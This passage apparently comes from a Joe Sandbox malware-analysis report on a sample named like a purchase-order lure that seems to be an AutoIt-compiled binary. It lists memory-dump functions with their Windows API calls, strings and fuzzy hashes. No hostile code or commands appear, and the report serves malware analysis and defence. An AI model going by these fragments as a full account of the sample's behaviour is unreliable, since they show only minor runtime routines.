                        • Instruction ID: a606a6f814d0c9092f9c5f627ea72b32daf22da32fa06d295508c21c84f3b5af
                        • Opcode Fuzzy Hash: 853634974a0019b466e9ab0ecb56d8a8a72cb8e2a52188c7862bae82d14667f8
                        • Instruction Fuzzy Hash: 5F01F2B16A11096BCB15EBE0C962EFF33AD9F01340F640015F543E72C1EE505E299AA1
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 002EC562
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1456604079-1403004172
                        • Opcode ID: 8d7bf6fb96a655e2294e59b0d7da0e77f3e15ff22c9201100974b8de29cf4199
                        • Instruction ID: 88e00e78b5730b446b978e9fcb86823442cbbd2608afbd1f86e761966a4338c1
                        • Opcode Fuzzy Hash: 8d7bf6fb96a655e2294e59b0d7da0e77f3e15ff22c9201100974b8de29cf4199
                        • Instruction Fuzzy Hash: 9901D671AA11096BCB15FBE4C952EFF73AD9F01741FB40015F443F32C1DA549E299A61
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp
                        • String ID: #32770
                        • API String ID: 2292705959-463685578
                        • Opcode ID: 4592526bc7de97f3b0808c7a9dc43ef68519c77922db90593c5fee69cf355de3
                        • Instruction ID: a568973564ab13dde4a8ddca200f3c08dfd0a762909a52e8ddc94d742be28ccb
                        • Opcode Fuzzy Hash: 4592526bc7de97f3b0808c7a9dc43ef68519c77922db90593c5fee69cf355de3
                        • Instruction Fuzzy Hash: 72E0D83360022967D721EAA6EC4AED7FBACEB517A4F00002AF924D3141DBB09A5587D0
                        APIs
                        • __umatherr.LIBCMT ref: 002DDA2A
                          • Part of subcall function 002DDD86: __ctrlfp.LIBCMT ref: 002DDDE5
                        • __ctrlfp.LIBCMT ref: 002DDA47
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __ctrlfp$__umatherr
                        • String ID: xn2
                        • API String ID: 219961500-2517301075
                        • Opcode ID: 692419fdf8b0452d96a87136a24f5e27f99cb2968f38cf4c42586b40d8d67705
                        • Instruction ID: ce016d1612007376396c38a56b373a3a9bcb798c2c9fd4d4ddb272c33059fca5
                        • Opcode Fuzzy Hash: 692419fdf8b0452d96a87136a24f5e27f99cb2968f38cf4c42586b40d8d67705
                        • Instruction Fuzzy Hash: 81E06571408A0FAADF027F80E8066997BA5EF04310F808095F58C14196DFB249B4DB57
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002EB36B
                          • Part of subcall function 002D2011: _doexit.LIBCMT ref: 002D201B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Message_doexit
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 1993061046-4017498283
                        • Opcode ID: 2eb3363195e82184fd59879ae46409ae897f5c3b75c0533cad75f6cf6e9f6562
                        • Instruction ID: 91aeb491dd0d8d9979de06d5bf3edaf51b6162a89785d585674af66350f5a80d
                        • Opcode Fuzzy Hash: 2eb3363195e82184fd59879ae46409ae897f5c3b75c0533cad75f6cf6e9f6562
                        • Instruction Fuzzy Hash: F8D0123139475832D21726957C47FC666888F55B92F014016FF08A55D68AD1A8A04699
                        APIs
                        • GetSystemDirectoryW.KERNEL32(?), ref: 0032BAB8
                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0032BCAB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: DirectoryFreeLibrarySystem
                        • String ID: WIN_XPe
                        • API String ID: 510247158-3257408948
                        • Opcode ID: 6aabfab658694da379733888172276fb45dfd5b95d2bb626f33e3d612a0e5a0c
                        • Instruction ID: f1e77d5f9f26fcf98f4cd844d36795d27b164a9517463e2f3fd5a0f8bf6b1c10
                        • Opcode Fuzzy Hash: 6aabfab658694da379733888172276fb45dfd5b95d2bb626f33e3d612a0e5a0c
                        • Instruction Fuzzy Hash: A2E0C270D1415DEFCB16DBA8EC85AEDF7BCBB18300F158886E026B2060C7B19A44DF21
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0031849F
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003184B2
                          • Part of subcall function 002F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F83CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 6727b07aa39647c98a91bf4738fd3178800682e2b795cd3715e44f44e84096fe
                        • Instruction ID: 087d1f8955597c1b052dd8ad48a0d9674cd29fa0fe24a8243805d9ed8a98f225
                        • Opcode Fuzzy Hash: 6727b07aa39647c98a91bf4738fd3178800682e2b795cd3715e44f44e84096fe
                        • Instruction Fuzzy Hash: 8BD01276394314B7E766A770EC8FFD7AA58AF14B51F040969B359AA2D0C9E0B810C760
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003184DF
                        • PostMessageW.USER32(00000000), ref: 003184E6
                          • Part of subcall function 002F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F83CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 95cfaea469eef73d97bb323b02c04162f280aa5c78dde43345ce6e288d996625
                        • Instruction ID: 86d81e23484e7a56cc7ee67268f4aea312c084087448c1ac87c569c0fc81f9ba
                        • Opcode Fuzzy Hash: 95cfaea469eef73d97bb323b02c04162f280aa5c78dde43345ce6e288d996625
                        • Instruction Fuzzy Hash: 08D012723843147BE766A770EC8FFD7A658AB18B51F040969B359AA2D0C9E0B810C764